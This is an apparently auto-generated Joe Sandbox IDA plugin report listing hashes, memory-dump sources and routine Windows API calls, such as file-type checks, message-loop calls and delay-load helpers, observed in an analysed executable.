                                                                                                              • Opcode ID: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                                              • Instruction ID: a7c53c707f4b9a6b71ca7c18ba3c218febe9e6cd8170f77a1faa08db1ecaa518
                                                                                                              • Opcode Fuzzy Hash: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                                              • Instruction Fuzzy Hash: F4D0A7B060020C7BDF406E618C03A7E7ADCDB01351F00413FBC04F5252EE76ED196656
                                                                                                              APIs
                                                                                                              • GetFileType.KERNELBASE(000000FF,0044964C), ref: 00449726
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileType
                                                                                                              • String ID:
                                                                                                              • API String ID: 3081899298-0
                                                                                                              • Opcode ID: 505480989a8c2884d808dff8f0ee1a872d14f19e23e5c9d0c105bd1a4e67041a
                                                                                                              • Instruction ID: 43a4ea8746019d31c3e7fdec04ba5ff3acffb89cf435754f1fb8970ac14272cc
                                                                                                              • Opcode Fuzzy Hash: 505480989a8c2884d808dff8f0ee1a872d14f19e23e5c9d0c105bd1a4e67041a
                                                                                                              • Instruction Fuzzy Hash: CAD01230032240D59E750E385D09067A7519B433A6B28DAF9E069C45A2CB26CC43F745
                                                                                                              APIs
                                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0045BF9C
                                                                                                                • Part of subcall function 0045991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0045992F
                                                                                                                • Part of subcall function 0045991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00459940
                                                                                                                • Part of subcall function 0045991E: TranslateMessage.USER32(?), ref: 0045994A
                                                                                                                • Part of subcall function 0045991E: DispatchMessageW.USER32(?), ref: 00459954
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$DispatchItemPeekSendTranslate
                                                                                                              • String ID:
                                                                                                              • API String ID: 4142818094-0
                                                                                                              • Opcode ID: bfca4b91dc4219dd3fa198c73ce6a6f696e7d76ac9b595c9d9679cdfb450a14a
                                                                                                              • Instruction ID: 073fb05611918c53acbc5ae6540916c291631a7cc10ab519a085ec5743d3b763
                                                                                                              • Opcode Fuzzy Hash: bfca4b91dc4219dd3fa198c73ce6a6f696e7d76ac9b595c9d9679cdfb450a14a
                                                                                                              • Instruction Fuzzy Hash: 9ED09E71144200EAD6112B52CE06F0EBAE2BB88B09F10495DB744340F286629D70AB0A
                                                                                                              APIs
                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0045C738
                                                                                                                • Part of subcall function 0045CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0045CB39
                                                                                                                • Part of subcall function 0045CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0045CB4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                              • String ID:
                                                                                                              • API String ID: 1269201914-0
                                                                                                              • Opcode ID: 0ba8eead7f4fe21705ba8036857a4c2ddd81b0659b9683c794b61aece58c2f2f
                                                                                                              • Instruction ID: 3248bfc798c11a70d6f9cde4dd611e9383708b8c65ea1483fd8eefc32012918c
                                                                                                              • Opcode Fuzzy Hash: 0ba8eead7f4fe21705ba8036857a4c2ddd81b0659b9683c794b61aece58c2f2f
                                                                                                              • Instruction Fuzzy Hash: 31B012A12B82026C3544D1055D46E7B090CC0C4F1B330C1BFBC09C0183E94C0C09823F
                                                                                                              APIs
                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0045C738
                                                                                                                • Part of subcall function 0045CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0045CB39
                                                                                                                • Part of subcall function 0045CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0045CB4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                              • String ID:
                                                                                                              • API String ID: 1269201914-0
                                                                                                              • Opcode ID: 0c5f112f9ab8eaeb541388975fd912b2d2c89e714836761fc2ffb2a35836f578
                                                                                                              • Instruction ID: fb5b0a3924375a34433af614da654d543138dceb3031c9d67e00ef0ca1c8e6f2
                                                                                                              • Opcode Fuzzy Hash: 0c5f112f9ab8eaeb541388975fd912b2d2c89e714836761fc2ffb2a35836f578
                                                                                                              • Instruction Fuzzy Hash: 50B012A12B83026C3544D1051D86E7B090CC1C4F1B330C0AFBC08C0183E94C0C09863F
                                                                                                              APIs
                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0045C738
                                                                                                                • Part of subcall function 0045CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0045CB39
                                                                                                                • Part of subcall function 0045CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0045CB4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                              • String ID:
                                                                                                              • API String ID: 1269201914-0
                                                                                                              • Opcode ID: 71d0fbec769ea39b764257786ba2975748f254fde61b17605d6f36ba018e8cd1
                                                                                                              • Instruction ID: 1cbdd3dd1ee84389ac8236bac79be0cfb1319d565ff21839aa0b2f3a7008eb85
                                                                                                              • Opcode Fuzzy Hash: 71d0fbec769ea39b764257786ba2975748f254fde61b17605d6f36ba018e8cd1
                                                                                                              • Instruction Fuzzy Hash: D7B012A12A83026D3544D1052F86E7B0A0CC0C4F1B330C0AFBC08C0183E94C0C0A863F
                                                                                                              APIs
                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0045C738
                                                                                                                • Part of subcall function 0045CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0045CB39
                                                                                                                • Part of subcall function 0045CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0045CB4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                              • String ID:
                                                                                                              • API String ID: 1269201914-0
                                                                                                              • Opcode ID: fb7d1ea13d953bc4e0ece1cc3090897d0b9be050a941c90e4fe9db98e72b050a
                                                                                                              • Instruction ID: f4715657dc86592c4a40d07370ea9fe3f69a87bb661c53288b2bc1770b7edbf1
                                                                                                              • Opcode Fuzzy Hash: fb7d1ea13d953bc4e0ece1cc3090897d0b9be050a941c90e4fe9db98e72b050a
                                                                                                              • Instruction Fuzzy Hash: 8CB012B12A8302BC390491411DC6E7B090CC0C4F2B330C1AFBC04D4083E94C1C49C63F
                                                                                                              APIs
                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0045C799
                                                                                                                • Part of subcall function 0045CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0045CB39
                                                                                                                • Part of subcall function 0045CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0045CB4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                              • String ID:
                                                                                                              • API String ID: 1269201914-0
                                                                                                              • Opcode ID: b0e85785b6696edbce6f6c3e9a0d0671bb829e852227694958752e5a6dace7dd
                                                                                                              • Instruction ID: b950c3c1bc0ec1c3bcb0779690991ceba0a62d126c2d9c17ad673168bafcc304
                                                                                                              • Opcode Fuzzy Hash: b0e85785b6696edbce6f6c3e9a0d0671bb829e852227694958752e5a6dace7dd
                                                                                                              • Instruction Fuzzy Hash: D0B012A129C2026D3144D1051D46E7B010DC0C4B1B330C01FBC08C1143E98C1C5E403F
                                                                                                              APIs
                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0045C799
                                                                                                                • Part of subcall function 0045CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0045CB39
                                                                                                                • Part of subcall function 0045CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0045CB4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                              • String ID:
                                                                                                              • API String ID: 1269201914-0
                                                                                                              • Opcode ID: 764ec9f0e7e6191a71711b6f92f10f4b365060b4e47efde5b7853a3a9bb92d8d
                                                                                                              • Instruction ID: a99f3217c662b27e73761e11f67d3c043ac32081cd30ddd332eacc064c9777b0
                                                                                                              • Opcode Fuzzy Hash: 764ec9f0e7e6191a71711b6f92f10f4b365060b4e47efde5b7853a3a9bb92d8d
                                                                                                              • Instruction Fuzzy Hash: E7B012A12983027D314491011CC6D7B010DC0C1B1B330C01FBC08D0043EA8C1C5D403F
                                                                                                              APIs
                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0045C799
                                                                                                                • Part of subcall function 0045CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0045CB39
                                                                                                                • Part of subcall function 0045CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0045CB4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                              • String ID:
                                                                                                              • API String ID: 1269201914-0
                                                                                                              • Opcode ID: 2bf3a6e0cd2c551fdc238b3a33a145eb6499591cc421b4a752d7669b7ea60ab5
                                                                                                              • Instruction ID: 2d03bae361f63d99fa0f74d5025ba9266ea6eafc95c8c939b8381b833bc7982b
                                                                                                              • Opcode Fuzzy Hash: 2bf3a6e0cd2c551fdc238b3a33a145eb6499591cc421b4a752d7669b7ea60ab5
                                                                                                              • Instruction Fuzzy Hash: 66B012A12983066D3144D1061C86E7B010CC0C4B1B330C01FBC08C0143E98C1C59413F
                                                                                                              APIs
                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0045C738
                                                                                                                • Part of subcall function 0045CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0045CB39
                                                                                                                • Part of subcall function 0045CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0045CB4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                              • String ID:
                                                                                                              • API String ID: 1269201914-0
                                                                                                              • Opcode ID: c06b4d6d6b8ce0328a3ece7b0e8d54dae40eb0aa9d988d8113aad607997cdf3f
                                                                                                              • Instruction ID: f824525e01105c083409cb3f4951e4de0dcdf1c9222d81f351ecd37618cbdf79
                                                                                                              • Opcode Fuzzy Hash: c06b4d6d6b8ce0328a3ece7b0e8d54dae40eb0aa9d988d8113aad607997cdf3f
                                                                                                              • Instruction Fuzzy Hash: A3A002A51A96077C354491515D46D77091CC4C5F5B330855FBC0594593A9481C495579
                                                                                                              APIs
                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0045C738
                                                                                                                • Part of subcall function 0045CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0045CB39
                                                                                                                • Part of subcall function 0045CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0045CB4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                              • String ID:
                                                                                                              • API String ID: 1269201914-0
                                                                                                              • Opcode ID: 9d8d64eee0915e17dcd78ff7549a1a738d956d542f9cf18c86d87f62d1ec634e
                                                                                                              • Instruction ID: f824525e01105c083409cb3f4951e4de0dcdf1c9222d81f351ecd37618cbdf79
                                                                                                              • Opcode Fuzzy Hash: 9d8d64eee0915e17dcd78ff7549a1a738d956d542f9cf18c86d87f62d1ec634e
                                                                                                              • Instruction Fuzzy Hash: A3A002A51A96077C354491515D46D77091CC4C5F5B330855FBC0594593A9481C495579
                                                                                                              APIs
                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0045C738
                                                                                                                • Part of subcall function 0045CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0045CB39
                                                                                                                • Part of subcall function 0045CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0045CB4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                              • String ID:
                                                                                                              • API String ID: 1269201914-0
                                                                                                              • Opcode ID: 742cd623df6cd45be66dbf857aa7c7920b2800267c57b0240d7c0145be9149ce
                                                                                                              • Instruction ID: f824525e01105c083409cb3f4951e4de0dcdf1c9222d81f351ecd37618cbdf79
                                                                                                              • Opcode Fuzzy Hash: 742cd623df6cd45be66dbf857aa7c7920b2800267c57b0240d7c0145be9149ce
                                                                                                              • Instruction Fuzzy Hash: A3A002A51A96077C354491515D46D77091CC4C5F5B330855FBC0594593A9481C495579
                                                                                                              APIs
                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0045C738
                                                                                                                • Part of subcall function 0045CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0045CB39
                                                                                                                • Part of subcall function 0045CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0045CB4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                              • String ID:
                                                                                                              • API String ID: 1269201914-0
                                                                                                              • Opcode ID: c0d1090b9c74f5780421459fabc31611b521bee651fad435abf3ab57afc7c7ed
                                                                                                              • Instruction ID: f824525e01105c083409cb3f4951e4de0dcdf1c9222d81f351ecd37618cbdf79
                                                                                                              • Opcode Fuzzy Hash: c0d1090b9c74f5780421459fabc31611b521bee651fad435abf3ab57afc7c7ed
                                                                                                              • Instruction Fuzzy Hash: A3A002A51A96077C354491515D46D77091CC4C5F5B330855FBC0594593A9481C495579
                                                                                                              APIs
                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0045C799
                                                                                                                • Part of subcall function 0045CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0045CB39
                                                                                                                • Part of subcall function 0045CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0045CB4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                              • String ID:
                                                                                                              • API String ID: 1269201914-0
                                                                                                              • Opcode ID: 2e39ee7c35a5730a0e6f8435fb532110a0a4d86e1d2ddb674e31bb07dd66d178
                                                                                                              • Instruction ID: 27accee5ead18d4a74379d9bd8af5696ef7d45706cc02f3edc95c1b1fd359f8d
                                                                                                              • Opcode Fuzzy Hash: 2e39ee7c35a5730a0e6f8435fb532110a0a4d86e1d2ddb674e31bb07dd66d178
                                                                                                              • Instruction Fuzzy Hash: 01A011A22A8203BC3008A2022C8AE3B020CC0C8B2B330880FBC0280083A8880C8A803E
                                                                                                              APIs
                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0045C799
                                                                                                                • Part of subcall function 0045CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0045CB39
                                                                                                                • Part of subcall function 0045CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0045CB4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                              • String ID:
                                                                                                              • API String ID: 1269201914-0
                                                                                                              • Opcode ID: 9acd64daa57566c328bb01305328a93e31de400dff05a2db132c0fe4ea9d0b82
                                                                                                              • Instruction ID: 27accee5ead18d4a74379d9bd8af5696ef7d45706cc02f3edc95c1b1fd359f8d
                                                                                                              • Opcode Fuzzy Hash: 9acd64daa57566c328bb01305328a93e31de400dff05a2db132c0fe4ea9d0b82
                                                                                                              • Instruction Fuzzy Hash: 01A011A22A8203BC3008A2022C8AE3B020CC0C8B2B330880FBC0280083A8880C8A803E
                                                                                                              APIs
                                                                                                              • SetEndOfFile.KERNELBASE(?,00448EDB,?,?,-00001954), ref: 00449B6D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File
                                                                                                              • String ID:
